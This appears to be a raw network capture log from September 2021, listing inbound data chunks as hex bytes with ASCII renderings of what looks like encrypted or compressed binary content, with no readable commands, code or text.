                                        2021-09-27 17:14:38 UTC16INData Raw: 26 65 39 c8 96 de 0d 8f a1 52 d8 5f 0e e7 e3 4d a4 bb 44 b9 7d 66 f0 83 28 59 13 08 17 f9 d9 39 9b f5 a6 5b 11 5f 37 e4 eb fa 74 35 ff 5f 5c 81 46 33 f2 67 32 25 d1 a6 bf 44 85 5a ab 9a 33 06 ed 17 bf 40 f1 b6 14 ec c2 21 c4 dd 42 42 7d 3b b3 c1 c9 6c b0 8f 5b 90 6e c2 8b b3 4c f5 d0 bb cb 5e 93 5b 43 bd 2b 74 ab bc 2a 42 ab 50 be 43 2c 0b 42 c5 3d 2c af 63 b6 cb 98 f9 ec 0d b7 c3 dc 70 e0 dc 4d 0b 4d f1 2b 60 d4 aa 96 e6 2b 1e d5 f0 d6 92 c4 b5 f8 e6 12 09 c8 8c 8f e2 b8 73 f1 90 46 0e 7e 71 de d2 5e c3 f9 4f 6b dd a8 cb fe 19 a0 a1 15 54 62 48 20 ff b6 61 d7 e6 67 21 91 cb ae a5 29 1f 74 f3 11 9f 78 37 ce ed 03 26 43 b6 40 da 70 4c 1c 46 8a 2d c5 ea 58 43 ee 7c 98 f4 36 5a bf fe a2 1b 60 b3 b7 e8 46 3c 23 1c 80 1d 1b 63 c1 c5 94 f3 8a 33 9d af 79 34 30
                                        Data Ascii: &e9R_MD}f(Y9[_7t5_\F3g2%DZ3@!BB};l[nL^[C+t*BPC,B=,cpMM+`+sF~q^OkTbH ag!)tx7&C@pLF-XC|6Z`F<#c3y40
                                        2021-09-27 17:14:38 UTC18INData Raw: 4b f1 92 d4 10 91 e2 40 6c dc e0 67 27 aa a1 c4 5f 21 2f c9 f5 cd d8 3f a0 c6 9f 8c 8f de a2 3f ad cf e4 c7 ed 56 0e f0 39 2f 3a 8e 08 6d 7f 38 f4 ce 10 61 49 00 db 05 0b 39 71 cd c5 5e cc df 57 87 6e b9 e3 50 b2 ca 89 98 ba 55 85 82 7c 9b b5 e3 ac 94 52 cd ae 17 e9 62 e8 29 ef b1 e5 b0 79 f5 f6 5a 1d 3d 13 3c 70 b8 7a e1 e2 0c 7c 98 0d b5 b5 d8 c3 5f 65 c7 bc 5b 0b 16 0a 46 9d 1e d2 a2 69 cb 5b 1a f6 91 53 f6 a6 d5 4f f8 8d d8 fd cc 52 f9 60 ce a9 c9 23 aa 15 38 19 fe 78 7d 97 45 5d b8 c1 70 03 67 a0 95 1d 23 5a 4c 1f 2a a9 18 c4 16 03 c8 7b 73 9d 57 f6 13 35 b0 b8 ad 18 fe b0 f9 f1 4b 7c 6b ee 0d 9d 94 ef 87 53 f3 62 f4 e1 d8 9c 24 38 43 9d 71 4d 73 c6 c3 c0 20 6d cb ae 90 1c ad f1 9c 9b 7e ac 67 b5 cb 45 c6 06 de e0 a6 c9 60 1a e3 32 b0 25 49 d4 eb b7
                                        Data Ascii: K@lg'_!/??V9/:m8aI9q^WnPU|Rb)yZ=<pz|_e[Fi[SOR`#8x}E]pg#ZL*{sW5K|kSb$8CqMs m~gE`2%I
                                        2021-09-27 17:14:38 UTC19INData Raw: ba 59 5e b5 46 fb 8b b3 46 f0 fa 93 f3 51 93 51 9d a7 3a 7c 82 48 2a 42 ad 1a 72 43 2c 0f 9c ca 18 37 92 63 b6 ce 8b d8 c4 2f b7 c3 d7 ae e0 cd 45 61 57 f0 2b 68 bb 6c 96 b6 2b c0 d9 d7 e1 92 c4 a5 d0 de 13 09 c2 52 8f ac ba 5b 4c 9e 46 08 11 da d4 d2 54 12 f6 6a 43 f0 a8 cb f5 0a 82 89 2d 28 68 42 fe f1 a7 69 ff ac 6d 21 97 ab 68 a5 29 0f aa fc 35 b7 4f 37 ce 7e 1a 05 6b 80 40 da 7a 35 16 57 82 0a 09 ea 58 5f 81 ba 99 f4 3c 84 b0 6d 80 2c 60 bd bd fb 62 d0 11 1c 80 1b c5 63 e9 66 96 f3 8d 1b 55 af 79 ca 12 cd 13 c7 3d f3 26 09 a1 4b 16 3f 58 f0 c1 a1 4b ee de 50 83 ab 5f df f6 a1 1f c4 fe 71 30 6c 19 80 49 a9 99 96 72 df c0 3d bf 45 b4 9b e6 f3 a7 15 ad fe c3 dd 82 d8 b8 ea 45 32 1c dc 1a 0b 6d 12 4c eb 61 e6 b3 17 b8 16 62 86 2e f1 31 f0 4c 53 83 9b 0a
                                        Data Ascii: Y^FFQQ:|H*BrC,7c/EaW+hl+R[LFTjC-(hBim!h)5O7~k@z5WX_<m,`bcfUy=&K?XKP_q0lIr=EE2mLab.1LS
                                        2021-09-27 17:14:38 UTC20INData Raw: 7b 6b 9d a2 d6 33 f8 47 ba b8 7e e5 0d 9f 27 84 64 20 6f 16 14 e0 35 1d b3 df 2b 97 33 48 f7 8d b0 dc 6e 8b d1 ee de b4 08 55 e2 fa 89 ee 9a b5 68 55 6a e2 ff e3 74 40 44 44 03 cd 2b 3b 86 34 e4 06 13 4b c9 21 48 71 89 97 31 a4 50 25 6d 35 30 dc 0c 92 0c f0 f0 4d dc 10 d3 0b 27 bd c5 17 5a 67 5e 00 e9 b2 21 e9 a4 9b 67 c3 99 a7 aa 1a b2 0d 17 a5 9b 5b 52 d5 16 a7 47 6a 5b 5e 62 3c d2 32 89 99 c3 5b 33 39 0a dd 92 2e ae 81 2a 78 f8 40 06 d4 98 9d 09 41 44 0a 2b d1 c0 bc c1 f3 11 c6 09 94 7c db 01 65 ff c8 96 de bc 83 99 7d de fd 15 29 fb 22 b8 93 bb bd df 71 8f 5c 2e fb 08 c6 02 f4 88 0e 9b ff bf 47 1d 78 71 f1 eb f0 ae 1d 94 57 74 59 e4 22 e4 13 f2 87 c0 bc 7d 35 b7 72 9c 9e 91 1d ee 15 91 da e0 a6 00 31 60 21 dc dd f7 42 7d 37 d0 01 ba 10 ba 51 52 a6 40
                                        Data Ascii: {k3G~'d o5+3HnUhUjt@DD+;4K!Hq1P%m50M'Zg^!g[RGj[^b<2[39.*x@AD+|e})"q\.GxqWtY"}5r1`!B}7QR@
                                        2021-09-27 17:14:38 UTC22INData Raw: a2 a9 d9 cd e7 a1 cd c6 10 3d 54 04 e5 15 21 38 8a 0e 02 8a 43 f4 c4 39 04 9b 7c dd 2d 76 11 65 c7 ed 7a e4 df 50 5a e9 b0 6d e7 42 45 9a 9d a6 4a 87 81 3b a2 b4 e3 ac 43 3d b6 b2 16 c1 27 f1 1a 9f bf 75 c6 15 2f a2 72 1d 3c 3d 39 77 d7 a2 c9 e2 07 54 b6 61 ee 97 26 5b 5f 6f 7a d1 4a 1d 07 08 7d d1 0f d5 8f 7a bc 59 1e f0 fe 58 f4 a7 df 6d b1 87 c9 ff 8b 2a f8 60 ce b3 9a 36 7d 53 4b 18 ff 7e 5f fc 4d 4c ba 86 12 00 67 ac 95 23 23 5a 40 11 fb a3 77 10 3e 2a c2 71 5d 8d 3d f4 19 ed 97 d3 aa 09 f1 5f 49 f1 44 7c 6b ee c7 8e 87 ed b9 79 f3 69 3a e1 cc 8f 23 46 4d 8b 67 49 d4 ef ed db 09 1d f9 aa 96 a4 6e f3 9c b6 6f a9 19 4e e5 47 cc 28 1e 9e 84 c3 48 72 c9 cd b6 0d 64 bb 86 bd c4 45 2d 39 02 e8 1a 04 6b 08 b4 0a 25 eb 2e e8 c5 7f 33 d5 95 68 71 77 90 a0 d6
                                        Data Ascii: =T!8C9|-vezPZmBEJ;C='u/r<=9wTa&[_ozJ}zYXm*`6}SK~_MLg##Z@w>*q]=_ID|kyi:#FMgInoNG(HrdE-9k%.3hqw
                                        2021-09-27 17:14:38 UTC23INData Raw: 70 34 7f b9 ca 18 00 16 d4 a0 f0 a7 f0 8e 35 b7 c5 fb ab 3d 9e 42 23 5d db 35 18 98 6c 96 e2 39 f3 cf a6 c4 92 c4 bb 5e 69 04 38 ce 7a c4 f3 b0 5d 61 95 9b 3b 16 b7 de fa 1d 1d f6 6c 41 f4 e8 20 f4 0a 82 f7 20 54 62 46 d6 10 a5 69 f9 0e 27 21 97 ae 5b bc 57 1d aa fc 30 9f bf 35 ce e1 38 21 6b 8e 4a 5a 72 92 1c 53 5f f8 0f ea 58 3b 89 ba 98 f0 14 aa b2 db 8c 3a 48 9d bd fb 68 02 20 ba 80 17 c5 1d e1 7c 96 f7 f2 13 55 af 7d 51 d1 cd 13 be 42 db 26 6e a9 24 df 30 58 fa 1b c5 63 ee df 56 ec 62 5f 02 f6 ce f0 63 ff 7b 4e c0 15 80 4d b1 b1 b8 72 df ca 2b 91 2a ca 93 e6 5f af 6b a5 d6 c3 d9 ed c5 b4 ea 4f 3a c6 b3 12 10 6d 18 47 ed 49 17 b1 e3 b2 00 4a 25 2e f1 3b 67 bf 52 95 6a 0b c7 8c 42 6c de 3c 7e 67 82 de ab 96 2b 07 a4 ed 17 b1 1f 89 c6 95 f4 86 d9 cd e9
                                        Data Ascii: p45=B#]5l9^i8z]a;lA TbFi'![W058!kJZrS_X;:Hh |U}QB&n$0XcVb_c{NMr+*_kO:mGIJ%.;gRjBl<~g+
                                        2021-09-27 17:14:38 UTC24INData Raw: 80 e5 42 90 8d 3f 6b 5b 92 25 10 21 a8 0a 4a d2 fe 8f 06 91 b4 68 77 05 e8 ef cb a7 54 ba 43 56 bc ea 28 78 33 e1 ff 6c 0e cb 01 e8 5d d8 86 c8 db 5d db 6c 6e 5d 1c a8 92 0a e6 f0 4d b4 f5 d2 54 0f c1 39 9a 45 4b 6e 10 81 d1 c1 e8 ae f2 71 c5 f6 4e 83 0a b7 1c 16 e2 dc 59 52 d9 2b b5 3e c1 25 5e 66 15 66 3c 88 9f e1 fc 14 39 00 b6 ad f0 af 87 aa 1d f0 40 02 c1 b7 e3 d5 40 42 24 10 d8 4d a3 41 fb 10 d5 1d fb 64 cd 03 49 0c 44 e9 d4 1e 93 e6 66 d9 5f 0e 11 c7 5c ac 99 3b b1 7d 60 9b 51 a8 7e 19 d6 1c 01 57 0f 9b f5 ae f0 27 3a 0f e4 ed d8 49 37 ee 51 62 7b 68 33 f4 02 e2 16 c8 d2 69 4b a0 76 b4 7e 31 0c f8 20 b3 78 f1 bc 9e 3a c2 30 c8 cd e4 43 7d 3d de bf e1 21 ba 51 52 9d a3 f7 8b b5 50 ce de 93 f3 54 85 62 84 c3 32 7c 83 4c 02 a4 af 3f 7e 6b 08 01 9c c0
                                        Data Ascii: B?k[%!JhwTCV(x3l]]ln]MT9EKnqNYR+>%^ff<9@@B$MAdIDf_\;}`Q~W':I7Qb{h3iKv~1 x:0C}=!QRPTb2|L?~k
                                        2021-09-27 17:14:38 UTC25INData Raw: c2 34 89 38 5d cd fc 7b d6 09 42 51 fc a3 f0 4b 9a ec 92 87 9a bf 97 a9 5a a1 a4 e8 8e 5b 2d b3 aa 04 f1 79 da 09 82 99 63 ab 66 ea 20 73 31 37 04 26 6d 01 bb ea fd 10 47 a7 0d a4 a4 a8 52 a1 64 e1 cc 4e 1a 1d 26 7d d9 1c d8 b7 50 83 53 09 eb fe 3a ed b9 c0 99 a3 a3 d2 ea ef 31 2f 73 cf a5 ab 22 f3 3d 72 00 e1 5d ab ec 69 57 a3 e2 0c d7 74 ad a2 45 30 41 46 26 f1 b4 39 3c 3f 06 c3 6a 7e a4 33 22 00 38 87 e0 be 03 f8 7f ed c6 49 82 6a c8 1e 9f 8a cc a0 65 e0 73 2a f0 d7 90 29 b8 4c b1 7c 58 74 71 e9 e0 40 f8 36 51 89 3f 7d e8 9c 8c 74 b6 20 98 ca 69 d9 06 01 e1 a6 c9 4a 67 ea 23 a3 62 7b d5 eb b7 d7 5b 3e 6e 33 f3 1a 11 58 51 93 f4 22 ef 21 f8 ce 6f 8a c0 9f 77 53 69 82 b4 39 29 ca ba ac 87 70 f4 17 81 ef 69 6e 13 64 2e 0a d8 5f f9 54 de 22 ac e3 52 ec 8f
                                        Data Ascii: 48]{BQKZ[-ycf s17&mGRdN&}PS:1/s"=r]iWtE0AF&9<?j~3"8Ijes*)L|Xtq@6Q?}t iJg#b{[>n3XQ"!owSi9)pind._T"R
                                        2021-09-27 17:14:38 UTC27INData Raw: a8 7e 91 8a 02 c0 d9 d8 e1 92 c4 9f 90 85 31 09 c2 52 8f f3 b0 ab 73 c9 6e 99 11 b7 d4 65 43 cb 7b 41 43 ea a9 d8 e7 1b 90 98 3e 53 0e 61 fe ff a7 69 ff 26 47 61 cc 8c 77 a4 29 1f 82 dc 35 b7 45 33 e6 f0 13 05 6d e1 59 db 7a 98 30 45 93 01 18 f9 5e 5d a9 eb 98 f4 3a 97 b7 06 20 2c 60 b3 ac ff 73 07 1d 05 a8 46 c5 63 ef 6f 91 2e 14 1b 55 af 51 09 18 cd 19 9c 04 f3 26 64 70 c9 16 30 58 f8 e1 bf cb ee df 61 f9 a8 4e 0e 93 bc 1e 63 f5 1e 2e e9 15 8a 61 f5 99 96 74 cc d7 2c a8 54 a4 93 ce 0f ab 15 ab c5 d6 da ee 2f b4 ea 45 27 1c dc 3a 51 36 31 4d eb 61 e6 b3 e3 44 29 3b 23 bf f1 31 7b f6 44 55 19 21 b9 84 43 7f cc 53 63 76 94 dd a8 7c 2b 07 ae f7 cd de 37 c8 9d b7 95 9f d9 c7 c5 8d ce ee e5 2c 50 1f e0 17 18 10 df 0e 02 01 2b f3 1a 2b 21 7c 00 dd 27 5f 01 71
                                        Data Ascii: ~1RsneC{AC>Sai&Gaw)5E3mYz0E^]: ,`sFco.UQ&dp0XaNc.at,T/E':Q61MaD);#1{DU!CScv|+7,P++!|'_q
                                        2021-09-27 17:14:38 UTC28INData Raw: de 67 45 42 03 ad fd 2b 8e 26 df 1b 6e 51 cf 36 c1 5a d8 86 37 c9 47 34 61 27 4e 39 25 83 0a e6 04 ee b3 07 c0 00 32 a0 2f 02 2d c6 41 11 ee dc d3 e5 b5 90 60 d3 6a 55 a6 32 17 1c 10 87 50 54 44 43 2b ab 2d 46 4c c4 4e 05 09 30 83 8c ee 08 21 39 00 a9 7d f1 a2 96 a2 4f ff 51 0a aa c8 f2 d6 4a 98 05 25 df 65 fc c1 f3 16 de 10 f6 4f cc 03 47 1d c1 87 dd 0f 95 e6 48 d9 5f 0e 35 3d 50 bd 9a 97 be 6c 69 f0 12 28 59 13 0a 10 f6 f1 0e 9b f4 b0 48 0f 75 0f 0a eb a0 94 34 e2 57 74 53 46 31 f4 53 f5 29 b6 ad 6d 4b a0 72 9c 89 03 09 fe 61 97 78 f1 8e 1e 32 d3 26 c0 de ed 42 75 24 22 06 e5 62 b8 47 53 a3 44 7b 3c 9b 73 e7 f0 99 e9 52 93 59 85 43 3b 50 90 4a a4 f5 ae b1 cf 95 3b db 8b 1c 95 2f 98 63 b7 ca 92 d4 c4 3d ad 3d d7 82 f0 ce 53 24 5f 7e 9c 65 35 db be d3 20
                                        Data Ascii: gEB+&nQ6Z7G4a'N9%2/-A`jU2PTDC+-FLN0!9}OQJ%eOGH_5=Pli(YHu4WtSF1S)mKrax2&Bu$"bGSD{<sRYC;PJ;/c==S$_~e5
                                        2021-09-27 17:14:38 UTC29INData Raw: 3d bf 4d 26 6d b5 10 e3 b8 e0 3f b1 ae 72 b0 73 ec f7 5a 25 3d 15 27 a9 d7 af cb e4 2c 15 c0 0d b5 bd b7 5b 5f d1 cd c2 4c 2a 16 0e 6e 0d 1c d2 a4 50 9c 59 1a f0 fe 2b f6 a4 df 67 a2 78 d8 fb e4 0a f9 60 c4 a2 8a 31 e8 2c 63 1b fe 7e 55 ed 45 5f b2 e9 16 06 65 a6 bd 94 23 5a 46 cb e8 ab 18 ce 3e 2a c8 7b 75 b5 3d f6 13 33 98 68 ae 18 f8 41 f6 d9 7c a5 68 e4 19 82 93 c7 bf 53 f3 68 2a e1 cc 8f 23 40 4d 9d 71 a2 66 f5 ed 2a 0b 06 c9 a1 96 34 6e e9 9c 9d 6e ba 38 63 cb ca cc 2e 15 da a6 c3 59 60 f2 36 8e 8d 6e d4 eb bd d5 4b 36 b9 21 c4 19 18 50 4a b4 1b 27 d9 d5 e8 e9 7d 55 cc b4 be 76 61 8a b0 28 23 d0 5d 53 aa 56 ee 1e 92 11 41 64 0c 67 36 0b cb 4a e2 5d 24 3f 7e e4 68 f0 86 37 01 59 eb 44 16 09 9e 23 4e d8 e3 9a 6d 98 a4 6c 65 94 e3 c2 cd b2 22 49 5b 1a
                                        Data Ascii: =M&m?rsZ%=',[_L*nPY+gx`1,c~UE_e#ZF>*{u=3hA|hSh*#@Mqf*4nn8c.Y`6nK6!PJ'}Uva(#]SVAdg6J]$?~h7YD#Nmle"I[
                                        2021-09-27 17:14:38 UTC31INData Raw: 68 23 2d ab 00 e5 65 43 fb a7 d2 0a 0b ae 83 2f 7c 22 43 fe f5 ac 73 ec 29 67 30 98 bb 7e 5b 28 39 a7 ed 38 af df 0e 02 1b ef fa 74 99 53 d5 7a 83 13 48 9b fb 08 c6 74 54 8c ae b0 75 3e 84 b6 cc 07 2b 60 b3 bc e8 6c 05 15 0a 91 1d df f9 c1 6d 96 f3 86 b9 44 a1 6d 2a 0f db 3b 1c 3c f3 2c 71 b7 58 19 30 49 ff de b5 b5 ef f3 5c 92 a1 49 98 d4 b0 1f 63 f5 7a 2f e7 06 8f 49 b6 96 80 8c de ec 3e a8 56 bb 9b f7 50 b4 09 53 d7 ef df a9 09 8c 71 be d8 e3 da 6e 34 6d 12 4f c1 7a d6 bb e3 e4 16 62 0b 12 f1 31 60 69 4e 80 94 0c 91 4c 42 6c d0 6a 68 64 82 dc ec 7b 2b 07 a4 fa df dd 03 9b c2 8d 8e 88 cb cc fb be ca fc ea 2b 47 08 e4 17 15 2b 89 1c 05 11 10 ae c4 38 0f 6d 07 f5 6c 76 39 7b cd 33 60 e9 f7 66 5a e3 b3 ef 44 90 d5 b1 98 b0 4b 48 85 52 89 b4 f3 a6 4a 2c b3
                                        Data Ascii: h#-eC/|"Cs)g0~[(98tSzHtTu>+`lmDm*;<,qX0I\Icz/I>VPSqn4mOzb1`iNLBljhd{++G+8mlv9{3`fZDKHRJ,
                                        2021-09-27 17:14:38 UTC32INData Raw: 36 15 a1 3e f1 24 57 ae 0b db 1c dd aa 17 14 22 47 6e 19 f6 23 c1 c4 a8 9f 64 c5 de 0a aa 1a be 31 c9 94 4d 59 5a c5 f9 a1 10 4f 4d 52 66 1c 12 ce 88 b3 e9 57 31 12 b1 a8 5a 2f ae 87 b1 53 fa 40 34 c5 9f f2 d6 40 44 0c 36 f5 4c 83 c3 9c e9 d5 19 8f 40 d8 01 5a 61 32 96 d4 14 4c 85 42 ef 5f 04 33 cb 64 ac 93 b1 67 7d 62 f0 be 28 59 13 08 14 f4 c6 0e 9b ff 84 70 0f 77 05 3a eb da aa 35 ef 4b 74 53 46 33 f8 08 fd 30 d1 a0 7b 4b a0 73 9c 9a 12 0c f6 21 97 74 eb b6 1e 33 d9 00 ce f5 ab 42 7d 3d dc 07 c9 6c b8 7c 55 9f 44 e1 e4 fc 47 e6 fa 91 e7 31 c3 50 9d b7 38 13 d2 49 2a 48 73 33 50 74 2c 01 96 e2 20 04 98 69 68 c1 a1 d8 c5 25 b7 c3 d6 ae e4 cd 53 39 5d fc 31 66 bb 6d 8d d6 24 c0 08 d9 e1 92 81 bf d0 cf 10 0c b9 b3 8f f3 b4 73 3a 90 46 0e 7e e5 df d2 5e 3b
                                        Data Ascii: 6>$W"Gn#d1MYZOMRfW1Z/S@4@D6L@Za2LB_3dg}b(Ypw:5KtSF30{Ks!t3B}=l|UDG1P8I*Hs3Pt, ih%S9]1fm$s:F~^;
                                        2021-09-27 17:14:38 UTC33INData Raw: f5 9a 52 ab 04 3b 08 03 c7 56 73 cb da 45 85 a1 26 78 d9 1c d8 a2 59 95 d7 ad 26 f6 a5 41 12 43 6f b4 89 c1 f2 6a 9c 2f 68 4a 0d a3 27 e9 3d 69 1d d4 60 57 c5 56 6d bb e9 20 00 67 a6 f4 61 23 4b 50 24 ee 93 30 c3 3e 2a c8 6a 71 ae c3 f5 3f 1f 9e d6 85 3e fb 6e f0 c1 f1 7b 6b e4 18 85 94 d1 97 74 f0 68 2c 43 cb 98 0b 68 4f 9d 77 eb 62 e1 f9 cf 1f 2e 6e ae 96 3e 48 ef 8f 99 6f b8 0c 7b 35 44 e0 25 1c f7 36 fa cd 76 e1 32 a8 1e 6a d4 fa b9 da b1 20 6b 04 e0 0d 9a 6b 5f b4 0a 29 13 3e e9 c5 74 74 c7 94 68 71 52 ad b5 28 38 a0 51 ad ab 7b 1b 17 99 39 65 6c 1f 69 3d 00 dc 57 1c 4d 0c 27 aa ff 57 fb 84 2f 6f 4d 03 2f 3d 18 a4 36 66 f4 fd 89 6f 80 38 6f 7d 6a e3 e5 cc bb 6a 6c 41 09 b8 57 3d 91 36 55 06 61 59 dd 35 54 d0 f7 86 36 db 46 2c 7b 27 c3 35 1a 85 96 ef
                                        Data Ascii: R;VsE&xY&ACoj/hJ'=i`WVm ga#KP$0>*jq?>n{kth,ChOwb.n>Ho{5D%6v2j kk_)>tthqR(8Q{9eli=WM'W/oM/=6fo8o}jjlAW=6UaY5T6F,{'5
                                        2021-09-27 17:14:38 UTC34INData Raw: 91 d1 53 9a fb a1 bf b0 41 9c ea cc a3 b5 e9 b5 4d 3d b5 b1 10 ff 77 f6 94 2e f6 db b0 79 f5 cf 74 72 40 15 2d 7d c3 bb e8 f3 0e 3b ee 0d b5 b5 a4 52 4e 6c a2 96 4c 0b 1c 1d 61 c9 13 a1 f1 41 9c 53 09 fd ef 26 99 f0 df 67 a8 9c d6 25 d6 0e d1 57 c4 ba 81 22 f8 2c 6a 37 f4 6f 5c 82 bd 5d b2 e3 02 12 6e 8e 85 61 23 50 98 22 fe b8 10 1e e0 25 ed 53 42 b5 3d fe 00 22 b0 fa ad 18 f2 b0 f6 f3 7c 7c 6b a5 7d 8e 93 c5 bf 53 f3 f8 2a e1 cc eb 23 46 4d 69 71 49 65 e3 ed db 08 06 c9 ae 96 34 6e f3 9c 19 6e a9 08 40 cb 45 cc 84 14 e0 a6 de 48 76 e1 28 b6 0d 6f d6 eb bd c4 cb 20 47 20 ab 1a 00 43 89 b5 0a 23 c7 2b e9 c5 75 5c d3 94 68 7b 7a 99 b4 28 32 d4 89 ac ab 7a 28 1d 9b 39 75 65 0c 6d 27 11 d8 4f d8 4e 08 34 80 e5 4e fd 87 51 14 51 fd 28 3b 21 b1 12 4c d2 c3 89
                                        Data Ascii: SAM=w.ytr@-};RNlLaAS&g%W",j7o\]na#P"%SB="||k}S*#FMiqIe4nn@EHv(o G C#+u\h{z(2z(9uem'ON4NQQ(;!L
                                        2021-09-27 17:14:38 UTC35INData Raw: b1 76 08 c2 58 86 9c d5 5a 4c 9a 9a d6 1b be f2 d4 5d 72 a1 6a 43 e0 74 c3 f3 65 95 88 2d 5e 48 42 ff e3 a7 69 fd 26 2c 21 8d c1 68 ab 29 15 aa fc 36 b7 41 37 a9 92 10 0f 6b 8e 40 da 61 a2 18 57 03 05 09 ea 15 45 81 ab 8c ff 4f e5 b1 db 80 20 13 d1 bc fb 68 19 12 14 84 78 5d 63 e9 76 f9 d1 8d 1b 5f bc 7f 4d 3e cc 13 be 2f f6 37 6b bc 4d 79 17 59 f0 cb aa 4e f6 b0 7b 82 ab 55 13 f9 b9 70 49 fe 71 3a eb 3d e6 48 a7 93 85 76 ce c5 52 94 44 b4 91 f5 58 ba 12 bc d2 d5 cc 86 82 03 85 69 26 1c d6 11 cf 77 03 48 84 05 e7 b3 e9 bd 79 07 0a 2e fb ed af 4b 5a af 92 03 d6 d3 42 6c d0 9e 7e 60 ed cd c5 5f 21 2d ae f7 cd df 0b 88 c6 9d 8a db d9 d7 b2 ad c1 ee ef 3d 54 0c f6 1f 01 59 e1 0e 08 07 38 f4 c4 5a 0b 49 7b 97 2d 77 3d 72 ef 8a 71 cc d5 25 54 e3 b9 e1 2d d0 fd
                                        Data Ascii: vXZL]rjCte-^HBi&,!h)6A7k@aWEO hx]cv_M>/7kMyYN{UpIq:=HvRDXi&wHy.KZBl~`_!-=TY8ZI{-w=rq%T-
                                        2021-09-27 17:14:38 UTC36INData Raw: 51 c3 37 d6 75 af 87 36 d0 47 37 6f 19 27 3d 0d 98 22 f6 0f 4c a8 1d fb 9e 23 ab 3d 3e 2a 4a 6e 1b 93 88 c0 e8 a0 9f 0d 91 f6 44 af 64 c6 1d 10 87 69 20 53 d3 0d 8c 3e 93 43 58 71 c2 03 36 96 95 da d0 ed 37 25 9a 47 2f ae 8d a1 4b c0 40 02 cf 41 f2 fc 40 45 1c 34 d8 4d a9 c1 f3 48 8d 19 8b 76 cd 03 4c a4 ca ed 81 1e 92 8d 14 aa 5e 04 33 cb 2c ad 93 b1 94 6c 62 e4 10 28 59 1d fe 6d dd f1 04 b3 62 ac 48 09 51 0d cc 91 f1 aa 3f c4 31 6b 4f 6e 88 f4 08 fe a5 b1 ac 61 4f bf 68 b4 21 33 0c f4 88 f6 78 f1 b2 34 2c c0 18 df c5 8f 42 c9 3d dc 07 98 6c ba 40 42 b9 7e 53 8b b3 46 e6 f8 8a 0d 5f bf 4a e3 dc 3a 7c 87 60 34 41 ad 39 06 21 2c 01 98 e2 3f 04 98 69 36 a2 8b d8 c0 2f bb c3 de b5 1e cc 69 24 75 40 2b 66 bd 70 9a e6 29 da 27 d9 cd 95 ec 11 d0 de 14 12 ce 52
                                        Data Ascii: Q7u6G7o'="L#=>*JnDdi S>CXq67%G/K@A@E4MHvL^3,lb(YmbHQ?1kOnaOh!3x4,B=l@B~SF_J:|`4A9!,?i6/i$u@+fp)'R
                                        2021-09-27 17:14:38 UTC38INData Raw: 72 86 79 ff de 21 1d 3d 04 05 c8 d6 a8 e7 e9 01 4a c2 6e b5 bf b3 73 71 67 cd c4 64 25 14 0e 68 b7 db d3 a4 47 9b 22 14 f1 fe 2f 82 eb df 67 a3 85 06 f1 e3 07 ff 67 ab ed 8b 31 e2 e1 65 31 fe 7e 54 fd 45 5d b0 e9 10 01 43 8c bd 6b 23 5a 46 37 f1 9b 1c c2 32 28 c8 7b 21 b5 3d e5 3b 77 9b c2 ab 12 8b 58 f7 d9 76 77 6c cc 5c 8d 93 c1 97 ea f1 68 2c c9 ef 8f 23 4c 65 db 72 49 63 dd c9 db 08 0c a6 94 97 34 64 f4 b4 da 6c a9 0e 4e 72 47 cc 28 3d c3 a6 c3 42 5e a9 31 b6 0b 46 f0 eb bd ce 20 1b 46 20 e2 1d 28 0a 4d b4 0c 0b 7a 29 e9 c3 5d 7f d3 94 62 53 30 9a b4 2e 1a f0 44 ad a1 15 df 1d 9b 33 7d 4d 47 6e 3d 17 f0 f7 e0 4c 26 0b a3 e5 44 f5 ac 72 68 51 fb 06 35 21 a2 28 21 e8 ff 89 63 9f 9d 25 7e 6a e4 c6 72 af 42 42 6a 2a be f5 30 ae 7c f4 01 6b 79 ed 21 4c 57
                                        Data Ascii: ry!=Jnsqgd%hG"/gg1e1~TE]Ck#ZF72({!=;wXvwl\h,#LerIc4dlNrG(=B^1F F (Mz)]bS0.D3}MGn=L&DrhQ5!(!c%~jrBBj*0|ky!LW
                                        2021-09-27 17:14:38 UTC39INData Raw: ae 80 3c 50 6b d8 f2 e0 ad 7a fa 26 76 24 8a 5a 69 89 2c 03 a7 e2 27 b2 4f 26 cb f8 1e fb 6a a2 49 e2 e4 92 1c 57 9d 0a 1a ef 58 54 84 a0 66 f5 10 90 b6 d9 a2 32 63 b3 bb d3 46 14 1b 16 ef db c5 63 e3 67 85 f6 8c 0a 50 b4 87 3f 34 c3 11 9c 13 f3 26 64 94 62 e9 cf a7 ec d2 be 4b ff da 45 7d aa 73 01 e4 b2 1a 63 ee 74 2c 16 14 ac 42 a5 b1 1c 73 df ca 2e bb 58 a7 9e e6 4e ae 0b 53 d7 ef d4 ba 03 4b 15 ba 38 15 cf 1f 11 7c 17 52 e0 9f e7 9f f6 b2 1e 4a 15 2d f1 37 59 65 53 83 9e 65 75 84 42 66 c5 4e 65 62 82 cb c1 49 d5 06 82 f4 da cd 12 88 d7 9a 95 8e 27 cc c1 af e4 eb d7 88 aa f1 09 17 6e eb 8e 0e 08 2d 26 f6 df 08 0d 4b e8 dc 2d 77 61 71 c7 fc 72 e4 66 51 5a e5 b2 90 ea 9a fd 83 92 b7 2e 45 85 54 a9 a6 ed b0 59 21 8b 1e 16 e9 66 e0 14 88 94 e8 bd 70 d7 ef
                                        Data Ascii: <Pkz&v$Zi,'O&jIWXTf2cFcgP?4&dbKE}sct,Bs.XNSK8|RJ-7YeSeuBfNebI'n-&K-waqrfQZ.ETY!fp
                                        2021-09-27 17:14:38 UTC40INData Raw: 3b 17 2a 4b 6e 11 ee 8b c0 6d 7f 9d 67 de f6 44 aa 01 84 18 10 b0 41 59 52 f3 07 a0 2d 4f 76 57 64 7b c0 30 89 95 fd 4f 31 2d 2a 9a e7 2f ae 8d 82 24 f9 40 08 c7 f0 6a d6 40 4e 18 22 f0 df a8 c1 f9 7f c2 18 85 66 c7 dd 43 26 ff 96 d4 14 86 83 42 e0 5f 04 33 3d 5c aa b9 bb b9 7d 61 8f 45 28 59 19 d8 18 c3 dc 0e 95 ef ac 48 0e 64 3f e7 eb a7 ab 35 ee 0c 74 53 57 25 e7 0d cc 6d d0 ac 61 4b b1 77 83 95 cd 0d d2 02 e4 c4 f1 b6 14 18 dd 20 df f0 8c 53 78 22 d1 f9 c8 40 b4 58 45 b1 c8 42 b4 67 46 e6 f0 8c fd 4d 96 51 8c b8 20 82 82 64 3e 44 af 17 12 40 2c 07 b4 ee 18 04 92 0c 7a c1 8b d2 df 26 b2 c3 c7 ab f7 33 44 0f 5e e8 38 63 bb 7d 93 fb df c1 f5 dd f7 9f da ac d5 de 03 0c de ac 8e df bb 59 64 1a 47 08 1b a4 da cf 47 18 f6 7b 46 